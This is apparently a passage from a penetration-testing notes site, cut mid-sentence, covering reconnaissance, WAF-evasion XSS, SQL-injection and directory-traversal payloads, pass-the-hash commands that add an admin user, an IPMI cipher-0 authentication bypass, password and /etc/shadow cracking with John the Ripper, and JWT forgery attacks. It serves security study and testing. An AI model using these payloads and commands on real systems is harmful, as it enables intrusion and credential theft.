                        https://censys.io: We can navigate to https://search.censys.io/certificates or https://crt.sh and introduce the domain name of our target organization to start discovering new subdomains.

                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#the-harvester","title":"The Harvester","text":"

The Harvester: a simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information that helps identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering, organized into modules.

                        Automate the modules we want to launch:

1. Create a list of sources, one per line, in a file named sources.txt.

                        2. Execute:

                         cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

                        3. When the process finishes, extract all the subdomains found and sort them:

                        cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

                        4. Merge all the passive reconnaissance files:

cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\ncat facebook.com_subdomains_passive.txt | wc -l\n
                        ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan_1","title":"Shodan","text":"

                        Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

                        for i in $(cat ip-addresses.txt);do shodan host $i;done\n

With this we get detailed Shodan output for each IP on the list, which we can then use to look for DNS records.
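
For example, a quick reverse-DNS sweep over that list (a sketch using dig; host works equally well):

for i in $(cat ip-addresses.txt);do dig -x $i +short;done\n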

                        ","tags":["pentest","information gathering","web"]},{"location":"inmunity-debugger/","title":"Inmunity Debugger","text":"","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#installation","title":"Installation","text":"

                        https://www.immunityinc.com/products/debugger/

                        ","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#firefox-api-hooking-with-inmunity-debugger","title":"Firefox API hooking with Inmunity Debugger","text":"

Firefox uses a function called PR_Write, exported by the nss3.dll module, to write/submit data. Once the target enters their username and password and clicks the login button, the Firefox process calls PR_Write from nss3.dll; if we set a breakpoint on that function, we can see the data in clear text.

Reference: https://developer.mozilla.org/en-docs/Mozilla/Projects/NSPR/Reference/PR_Write

                        ","tags":["python","python pentesting","tools"]},{"location":"input-filtering/","title":"Input filtering","text":"

                        Input Filtering involves validating and sanitizing data received by the web application from users or external sources. Input filtering helps prevent security vulnerabilities such as SQL injection, cross-site scripting (XSS), and command injection. Some common techniques for input filtering include data validation, input validation, and input sanitization:

• Data Validation: Data validation checks whether the incoming data conforms to expected formats and constraints. Example: checking that an email field contains a syntactically valid address.
• Input Validation: Input validation goes a step further by not only checking data formats but also assessing data for potential security threats. It detects and rejects input that could be used for attacks, such as SQL injection payloads or malicious scripts.
• Input Sanitization: Input sanitization involves cleaning or escaping input data to remove or neutralize potentially dangerous characters or content (see the sketch after this list).
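
A minimal sketch of validation plus sanitization in bash (the field name, regex and character allowlist are illustrative, not from the original notes):

#!/bin/bash\n# Minimal sketch: validate, then sanitize, a user-supplied email field\nemail=\"$1\"\n# Data validation: accept only a syntactically valid address\nif [[ ! \"$email\" =~ ^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}$ ]]; then\n  echo \"invalid email\" >&2; exit 1\nfi\n# Input sanitization: keep only an allowlist of characters\nclean=$(printf %s \"$email\" | tr -cd 'A-Za-z0-9@._-')\necho \"$clean\"\n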
                        "},{"location":"input-filtering/#input-filtering-techniques","title":"Input filtering techniques","text":"
• Content Security Policy (CSP): CSP is a security feature that controls which sources of content are allowed to be loaded by a web page. It helps prevent XSS attacks by specifying which domains are permitted sources for scripts, styles, images, and other resources (a quick header check follows this list).
                        • Cross-Site Request Forgery (CSRF) Protection: Filtering mechanisms can be used to implement CSRF protection, ensuring that incoming requests have valid anti-CSRF tokens to prevent attackers from tricking users into performing actions they didn't intend.
                        • Web Application Firewalls (WAFs): WAFs are security appliances or services that filter incoming HTTP requests to a web application. They use predefined rules and heuristics to detect and block malicious traffic.
                        • Regular Expression Filtering: Regular expressions (regex) can be used to filter and validate data against complex patterns. However, improper regex usage can introduce security vulnerabilities, so careful crafting and testing of regex patterns are necessary.
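
To quickly check which of these defensive headers a target already sends (example.com is a placeholder):

curl -s -I https://example.com | grep -iE 'content-security-policy|x-frame-options|x-content-type-options'\n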
                        "},{"location":"input-filtering/#evasion-techniques","title":"Evasion techniques","text":"

                        Web application defense mechanisms are proactive tools and techniques designed to protect and defend web applications against various security threats and vulnerabilities.

                        Evasion in web application security testing refers to the practice of using various techniques and methods to bypass or circumvent security mechanisms and controls put in place to protect a web application.

                        "},{"location":"input-filtering/#bypass-what","title":"Bypass what!","text":"
                        • Authentication: Authentication mechanisms verify the identity of users and ensure that they have the appropriate permissions to access specific resources within the application. Common authentication methods include username and password, multi-factor authentication (MFA), and biometrics.
                        • Authorization: Authorization mechanisms determine what actions and resources users are allowed to access within the application once they have been authenticated. This includes defining roles, permissions, and access controls.
                        • Input Validation/Filtering: Input validation is the process of verifying and sanitizing data received from users or external sources to prevent malicious input that could lead to vulnerabilities like SQL injection, cross-site scripting (XSS), or command injection.
                        • Session Management: Session management mechanisms are responsible for creating, managing, and securing user sessions. They include measures like session timeouts, secure session tokens, and protection against session fixation attacks.
                        • Cross-Site Request Forgery (CSRF) Protection: CSRF protection mechanisms prevent attackers from tricking users into making unauthorized requests to the application on their behalf. Tokens and anti-CSRF measures are often used for this purpose.
                        • Security Headers: HTTP security headers like Content Security Policy (CSP), X-Content-Type-Options, and X-Frame-Options are used to control how web browsers should handle various aspects of web page security and rendering.
                        • Rate Limiting: Rate limiting mechanisms restrict the number of requests a user or IP address can make to the application within a specific time frame. This helps prevent brute force attacks and DDoS attempts.
                        • Web Application Firewalls (WAFs): WAFs are security appliances or software solutions that sit between the web application and the client to monitor and filter incoming traffic. They can detect and block common web application attacks, such as SQL injection, cross-site scripting (XSS), and application-layer DDoS attacks.
                        • Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): IDS and IPS solutions inspect network and application traffic for signs of suspicious or malicious activity. IDS detects and alerts on potential threats, while IPS can take proactive measures to block or prevent malicious traffic.
                        • Proxies: In the context of web applications, proxies refer to intermediary servers that facilitate communication between a user's browser and the web server hosting the application. These proxies can serve various purposes, ranging from enhancing security and privacy to optimizing performance and managing network traffic.
                        "},{"location":"input-filtering/#bypass-how","title":"Bypass how!","text":"
• Bypassing Web Application Firewalls (WAFs)/Proxy Rules: WAFs and proxies are designed to filter out malicious requests and prevent attacks like SQL injection or cross-site scripting (XSS). Evasion techniques may involve encoding, obfuscation, or fragmentation of malicious payloads to bypass the WAF's detection rules (see the encoding sketch after this list).
                        • Evading Intrusion Detection Systems (IDS): IDS systems monitor network traffic for signs of malicious activity. Evasion techniques can be used to hide or modify the payload of an attack so that it goes undetected by the IDS.
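
As a small illustration of the encoding idea (a sketch; assumes jq is installed and that the rule matches only the literal payload string):

payload=\"' or 6=6 --\"\n# URL-encode the payload so naive string-matching rules miss the raw form\nprintf %s \"$payload\" | jq -sRr @uri\n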
                        "},{"location":"input-filtering/#solutions-for-implementing-input-filtering","title":"Solutions for implementing input filtering","text":"

WAFs. A well-known open-source solution is ModSecurity. WAFs use rules to define what the filter must block or allow; these rules are usually written as Regular Expressions (RE or RegEx).

                        See notes on regex.

The best solution for protecting a webapp is whitelisting, but blacklisting methods (matching a collection of well-known attack patterns) are what is commonly found in deployments, and blacklists can often be bypassed.

                        "},{"location":"input-filtering/#waf-bypasses","title":"WAF bypasses","text":"
################\n# XSS: alert('xss') and alert(1)\n################\nprompt('xss')\nprompt(8)\nconfirm('xss')\nconfirm(8)\nalert(/xss/.source)\nwindow[/alert/.source](8)\n\n################\n# XSS: alert(document.cookie)\n################\nwith(document)alert(cookie)\nalert(document['cookie'])\nalert(document[/cookie/.source])\nalert(document[/coo/.source+/kie/.source])\n\n################\n# XSS: <img src=x onerror=alert(1);>\n################\n<svg/onload=alert(1)>\n<video src=x onerror=alert(1);>\n<audio src=x onerror=alert(1);>\n\n################\n# XSS: javascript:alert(document.cookie)\n################\ndata:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\n
################\n# Blind SQL injection: 'or 1=1\n################\n' or 6=6\n' or 0x47=0x47\nor char(32)=''\nor 6 is not null\n\n################\n# UNION-based SQL injection: UNION SELECT\n################\nUNION ALL SELECT\n
                        ################\n#  Directory Traversals: /etc/passwd\n################\n/too/../etc/far/../passwd\n/etc//passwd\n/etc/ignore/../passwd\n/etc/passwd.......\n
                        ################\n#  Webshells: c99.php, r57.php, shell.aspx, cmd.jsp, CmdAsp.asp\n################\naugh.php\n
                        "},{"location":"input-filtering/#fingerprinting-a-waf","title":"Fingerprinting a WAF","text":"

                        Tools: wafw00f and nmap script:

nmap -p 80 --script http-waf-detect $ip\nnmap -p 80 --script http-waf-fingerprint $ip\n
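
wafw00f takes the target URL directly:

wafw00f https://example.com\n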

                        Detecting a WAF manually

                        1. Cookies: Via cookie values.

• Citrix NetScaler: ns_af, citrix_ns_id, NSC_
• F5 BIG-IP ASM: TS followed by a string matching the regex ^TS[a-zA-Z0-9]{3,6}
• Barracuda: barra_counter_session, BNI__BARRACUDA_LB_COOKIE

2. Server cloaking: WAFs can rewrite the Server header to deceive attackers.

3. Response codes: WAFs can also modify HTTP response codes if the request is hostile.

4. Response bodies: WAF names can show up in response bodies, for instance mod_security, AQTRONIX WebKnight, dotDefender.

5. Drop action: WAFs can close the connection when they detect a malicious request.

                        "},{"location":"input-filtering/#client-side-filters","title":"Client-side filters","text":""},{"location":"input-filtering/#firefox","title":"Firefox","text":"

Browser add-ons such as NoScript are whitelist-based security tools that disable all executable web content (JavaScript, Java, Flash, Silverlight...) and let the user choose which sites are \"trusted\". A nice feature is its anti-XSS protection.

                        "},{"location":"input-filtering/#internet-explorer","title":"Internet explorer","text":"

Internet Explorer ships with the XSS Filter, which modifies reflected values in the following way:

                        # This payload\n<svg/onload=alert(1)>\n# is transformed to\n<svg/#nload=alert(1)>\n

The XSS Filter is enabled by default in the Internet zone, but websites that want to opt out of this protection can use the following response header:

                        X-XSS-Protection:0\n

                        Later on the Internet Explorer team introduced a new directive in the X-XSS-Protection header:

                        X-XSS-Protection:1; mode=block\n

                        With this directive, if a potential XSS attack is detected, the browser, rather than attempting to sanitize the page, will render a simple #. This directive has been implemented in other browsers.

                        "},{"location":"input-filtering/#chrome","title":"Chrome","text":"

Chrome has the XSS Auditor, which sits between the HTML parser and the JS engine.

The filter analyzes both inbound requests and outbound responses. If executable code from the request is found within the response, it stops the script and generates a console alert.

                        "},{"location":"interactsh/","title":"Interactsh - An alternative to BurpSuite Collaborator","text":"

Interactsh is an open-source tool for detecting out-of-band interactions, that is, vulnerabilities that cause the target to interact with an external system.

                        Website version: https://app.interactsh.com/

                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#installation","title":"Installation","text":"

                        Download from: https://github.com/projectdiscovery/interactsh/

                        go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n
                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#basic-usage","title":"Basic Usage","text":"
                        interactsh-client   \n

                        Cry for help:

                        interactsh-client  -h\n

The Interactsh server runs multiple services and captures all incoming requests. To host an instance of interactsh-server, you need to set up the following (see the example after this list):

                        1. Domain name with custom host names and nameservers.
2. A basic droplet (VPS) running 24/7 in the background.
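
With those two in place, a self-hosted server can be started along these lines (a sketch; flags may vary between releases, and example.com stands in for your domain):

interactsh-server -domain example.com\n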
                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#burpsuite-integrated","title":"Burpsuite integrated","text":"

interactsh-collaborator is a Burp Suite extension developed and maintained by @wdahlenb.

                        ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"invoke-the-hash/","title":"Invoke-TheHash","text":"

                        Collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#installation","title":"Installation","text":"

Download the PowerShell Invoke-TheHash functions from the GitHub repo: https://github.com/Kevin-Robertson/Invoke-TheHash.

                        When using Invoke-TheHash, we have two options: SMB or WMI command execution.

                        cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
                        Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

                        How to generate a reverse shell.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
                        Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

                        How to generate a reverse shell.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"ipmitool/","title":"IPMItool","text":"","tags":["pentesting","port 623","ipmi"]},{"location":"ipmitool/#ipmi-authentication-bypass-via-cipher-0","title":"IPMI Authentication Bypass via Cipher 0","text":"

                        Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

                        use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

                        Abuse this flaw with ipmitool:

                        # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H  $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
                        ","tags":["pentesting","port 623","ipmi"]},{"location":"jaws/","title":"JAWS - Just Another Windows (Enum) Script","text":"","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#installation","title":"Installation","text":"

                        Github repo: https://github.com/411Hall/JAWS.

                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#basis-usage","title":"Basis usage","text":"

                        Run from within CMD shell and write out to file.

                        CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt\n

                        Run from within CMD shell and write out to screen.

                        CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1\n

                        Run from within PS Shell and write out to file.

                        PS C:\\temp> .\\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt\n
                        ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"john-the-ripper/","title":"John the Ripper - A hash cracker and dictionary attack tool","text":"

John the Ripper (JTR or john) is a versatile tool: you can use it to crack password hashes as well as password-protected files.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#installation","title":"Installation","text":"

                        Download from: https://www.openwall.com/john/.

Run john --list=formats to get a list of the supported hash formats.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-hash","title":"Crack a hash","text":"","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-single-crack-mode-attack","title":"Hash: Single Crack Mode attack","text":"
                        john --format=sha256 hashes_to_crack.txt\n# --format=sha256: specifies that the hash format is SHA-256\n# hashes_to_crack.txt:  is the file name containing the hashes to be cracked \n

John will output the cracked passwords to the console and also append them to the file \"john.pot\" (~/.john/john.pot) in the current user's home directory.

                        Furthermore, it will continue cracking the remaining hashes in the background, and we can check the progress by running:

john --show hashes_to_crack.txt\n

                        Cheat sheet:

The command is always the same, john --format=<format> hashes_to_crack.txt; the supported formats include:

• afs: AFS (Andrew File System) password hashes
• bfegg: bfegg hashes used in Eggdrop IRC bots
• bf: Blowfish-based crypt(3) hashes
• bsdi: BSDi crypt(3) hashes
• crypt: traditional Unix crypt(3) hashes
• des: traditional DES-based crypt(3) hashes
• dmd5: DMD5 (Dragonfly BSD MD5) password hashes
• dominosec: IBM Lotus Domino 6/7 password hashes
• episerver: EPiServer SID (Security Identifier) password hashes
• hdaa: hdaa password hashes used in Openwall GNU/Linux
• hmac-md5: HMAC-MD5 password hashes
• hmailserver: hMailServer password hashes
• ipb2: Invision Power Board 2 password hashes
• krb4 / krb5 / mskrb5: Kerberos 4, Kerberos 5 and MS Kerberos 5 password hashes
• LM: LM (Lan Manager) password hashes
• lotus5: Lotus Notes/Domino 5 password hashes
• md4-gen: generic MD4 password hashes
• md5 / md5-gen: MD5 and generic MD5 password hashes
• mscash / mscash2: MS Cache and MS Cache v2 password hashes
• mschapv2: MS CHAP v2 password hashes
• mssql05 / mssql: MS SQL 2005 and MS SQL password hashes
• mysql-fast / mysql / mysql-sha1: MySQL fast, MySQL and MySQL SHA1 password hashes
• netlm / netlmv2 / netntlm / netntlmv2 / nethalflm: NETLM, NETLMv2, NETNTLM, NETNTLMv2 and NEThalfLM (NT LAN Manager) password hashes
• md5ns: md5ns (MD5 namespace) password hashes
• nsldap: nsldap (OpenLDAP SHA) password hashes
• ssha: ssha (Salted SHA) password hashes
• NT: NT (Windows NT) password hashes
• openssha: OpenSSH private key password hashes
• oracle11 / oracle: Oracle 11 and Oracle password hashes
• pdf: PDF (Portable Document Format) password hashes
• phpass-md5: PHPass-MD5 (Portable PHP password hashing framework) password hashes
• phps: PHPS password hashes
• pix-md5: Cisco PIX MD5 password hashes
• po: Po (Sybase SQL Anywhere) password hashes
• rar: RAR (WinRAR) password hashes
• raw-md4 / raw-md5 / raw-md5-unicode / raw-sha1 / raw-sha224 / raw-sha256 / raw-sha384 / raw-sha512: raw MD4, MD5, MD5 Unicode and SHA-family password hashes
• salted-sha: salted SHA password hashes
• sapb / sapg: SAP CODVN B (BCODE) and SAP CODVN G (PASSCODE) password hashes
• sha1-gen: generic SHA1 password hashes
• skey: S/Key (one-time password) hashes
• ssh: SSH (Secure Shell) password hashes
• sybasease: Sybase ASE password hashes
• xsha: xsha (Extended SHA) password hashes
• zip: ZIP (WinZip) password hashes
","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-wordlist-mode-attack","title":"Hash: Wordlist mode attack","text":"
                        john --wordlist=<wordlist_file> --rules <hash_file>\n

John takes a single wordlist per run; to use several wordlists, concatenate them into one file first (e.g. cat list1.txt list2.txt > combined.txt) or run John once per list.

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#hash-incremental-mode-attack","title":"Hash: Incremental mode attack","text":"

Incremental Mode is an advanced John mode used to crack passwords using a character set. It is a brute-force attack, which means it will attempt to match the password by trying all possible combinations of characters from the character set. This mode is the most effective yet most time-consuming of all the John modes.

                        john --incremental <hash_file>\n

                        Additionally, it is important to note that the default character set is limited to a-zA-Z0-9. Therefore, if we attempt to crack complex passwords with special characters, we need to use a custom character set.
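
A stock John build ships several named incremental modes in john.conf that we can select directly (mode names vary by build; Digits and ASCII are common):

john --incremental=Digits hashes_to_crack.txt\njohn --incremental=ASCII hashes_to_crack.txt\n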

                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#crack-a-file","title":"Crack a file","text":"

                        For cracking files you have the following tools:

• pdf2john: converts PDF documents for John
• ssh2john: converts SSH private keys for John
• mscash2john: converts MS Cash hashes for John
• keychain2john: converts OS X keychain files for John
• rar2john: converts RAR archives for John
• pfx2john: converts PKCS#12 files for John
• truecrypt_volume2john: converts TrueCrypt volumes for John
• keepass2john: converts KeePass databases for John
• vncpcap2john: converts VNC PCAP files for John
• putty2john: converts PuTTY private keys for John
• zip2john: converts ZIP archives for John
• hccap2john: converts WPA/WPA2 handshake captures for John
• office2john: converts MS Office documents for John
• wpa2john: converts WPA/WPA2 handshakes for John

If you need additional ones, run:

                        locate *2john*\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#basic-usage","title":"Basic usage","text":"
                        # Syntax. Three steps:\n# 1. Extract hash from file\n<tool> <file_to_crack> > file.hash\n# 2. Crack the hash\njohn file.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> file.hash \n\n# Example with a pdf:\n# 1. Extract hash from file\npdf2john server_doc.pdf > server_doc.hash\n# 2. Crack the hash\njohn server_doc.hash\n# 3. Another way to crack the hash\njohn --wordlist=<wordlist.txt> server_doc.hash \n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

First, copy /etc/passwd and /etc/shadow from the victim machine to the attacker machine.

                        Second, use unshadow to put users and passwords in the same file:

                        unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

Third, run John the Ripper. You can brute-force a list of users or target specific ones:

john -incremental -users:<userList> <fileToCrack>\n\n# To display the passwords recovered:\njohn --show crackme\n\n# Default path to cracked passwords: /root/.john/john.pot\n\n# Dictionary attack\njohn -wordlist=<file> -users=victim1,victim2 -rules <filetocrack>\n# -rules parameter adds some mangling to the wordlist\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
                        cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\ncat hash\njohn --wordlist=/root/Desktop/wordlists/1000000-password-seclists.txt hash\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-a-zip-file","title":"Cracking password of a zip file","text":"
                        zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"jwt-tool/","title":"JWT tool","text":""},{"location":"jwt-tool/#jwt-attacks","title":"JWT attacks","text":"

Two tools: jwt.io and jwt_tool.

                        To see a jwt decoded on your CLI:

jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug\n

Also, since each part of the JWT is base64-encoded, we can decode it by echoing each of its parts:

echo eyJhbGciOiJIUzUxMiJ9 | base64 -d && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

                        Results:

                        {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

                        To run a JWT scan with jwt_tool, run:

                        jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

Some more jwt_tool flags that may come in handy:

                        # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
                        "},{"location":"jwt-tool/#the-none-attack","title":"The none attack","text":"

                        A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

                        To craft a jwt with \"none\" as the value for \"alg\", run:

                        jwt_tool <JWT_Token> -X a\n
                        "},{"location":"jwt-tool/#the-null-signature-attack","title":"The null signature attack","text":"

The second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether while leaving the trailing period in place.

                        "},{"location":"jwt-tool/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

Launching this attack is relatively simple: remove the password value from the payload, leave it blank, and regenerate the JWT.

                        Also, with jwt_tool, run:

                        jwt_tool <JWT_Token> -X b\n
                        "},{"location":"jwt-tool/#the-algorithm-switch-or-key-confusion-attack","title":"The algorithm switch (or key-confusion) attack","text":"

A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This matters because RS256 is an asymmetric scheme: both the provider\u2019s private key and a public key are needed to produce and verify the JWT signature. Meanwhile, HS256 is symmetric, so the same key is used for both the signature and the verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

                        jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
                        "},{"location":"jwt-tool/#the-jwt-crack-attack","title":"The jwt crack attack","text":"

JWT_Tool can test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

                        jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

                        You can generate this wordlist for the secret signature of the json web token by using crunch.
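
For instance, a small crunch run (the lengths and charset are illustrative):

crunch 4 6 abcdef0123456789 -o wordlist.txt\n# 4 and 6 are the minimum and maximum candidate lengths; -o writes the output wordlist\n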

Once you crack the secret of the signature, we can create our own trusted tokens:

1. Grab another user's email (in the crapi app, from the data exposure vulnerability when getting the forum: GET {{baseUrl}}/community/api/v2/community/posts/recent).

2. Generate a token with the secret.

                        "},{"location":"jwt-tool/#spoofing-jwks","title":"Spoofing JWKS","text":"

Specify the JWKS URL with -ju, or set it in jwtconf.ini to automate this attack.

                        "},{"location":"jwt-tool/#inject-inline-jwks","title":"Inject inline JWKS","text":""},{"location":"kernel-vulnerability-exploitation/","title":"Kernel vulnerability exploitation","text":"System vulnerability Exploit Ubuntu 16.04 LTS Exploit 39772 Ubuntu 18.04 LTS + lxd lxd privilege escalation","tags":["pentesting","privilege escalation","linux"]},{"location":"keycloak-pentesting/","title":"Pentesting Keycloak","text":"

                        Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.

                        Sources
                        • https://www.surecloud.com/resources/blog/pentesting-keycloak-part-1
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#fingerprint-and-enumeration","title":"Fingerprint and enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#keycloak-running","title":"Keycloak running...","text":"

For assessing an environment running Keycloak, we first need to fingerprint it, meaning to identify that we are facing a Keycloak implementation and to determine which version it is. For that:

1. Cookie Name \u2013 Once logged in with valid credentials, pay attention to cookies (Keycloak sets distinctive ones such as AUTH_SESSION_ID, KEYCLOAK_IDENTITY and KEYCLOAK_SESSION).
                        2. URLs: Keycloak has a very distinctive URL.
                        3. JWT Payload: Even if this is an OAuth requirement, the JWT could also give you a hint that you\u2019re using Keycloak, just by looking at sections like \u2018resource_access\u2019 and \u2018scope\u2019.
                        4. Page Source: Finally, you might also find references of /keycloak/ in the source code of the login page.
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#version","title":"Version","text":"

                        At the moment, there is no way to identify the running Keycloak version by looking at it from an unauthenticated perspective. The only way is via an administrative account (with the correct JWT token in the request header): GET /auth/admin/serverinfo.

The latest stable version of Keycloak is available at https://www.keycloak.org/downloads \u2013 make sure the client is running the latest. If not, check whether there are public CVEs and/or exploits on:

• https://repology.org/project/keycloak/cves
• https://www.cvedetails.com/version-list/16498/37999/1/Keycloak-Keycloak.html
• https://www.exploit-db.com/

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#openid-configuration-saml-descriptor","title":"OpenID Configuration / SAML Descriptor","text":"
/auth/realms/<realm_name>/.well-known/openid-configuration\n/auth/realms/<realm_name>/protocol/saml/descriptor\n

                        For public keys:

                        /auth/realms/<realm_name>/\n
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#realms","title":"Realms","text":"

                        A realm manages a set of users, credentials, roles, and groups. A user belongs to and logs into a realm. Realms are isolated from one another and can only manage and authenticate the users that they control.

                        When you boot Keycloak for the first time, Keycloak creates a pre-defined realm for you. This initial realm is the master realm \u2013 the highest level in the hierarchy of realms. Admin accounts in this realm have permissions to view and manage any other realm created on the server instance. When you define your initial admin account, you create an account in the master realm. Your initial login to the admin console will also be via the master realm.

                        It is not recommended to configure a web application\u2019s SSO on the default master realm for security and granularity. Realms can be easily enumerated, but that\u2019s a default behaviour of the platform. Obtaining a list of valid realms might be useful later on in the assessment.

                        It is possible to enumerate via Burp Suite Intruder on the following URL:

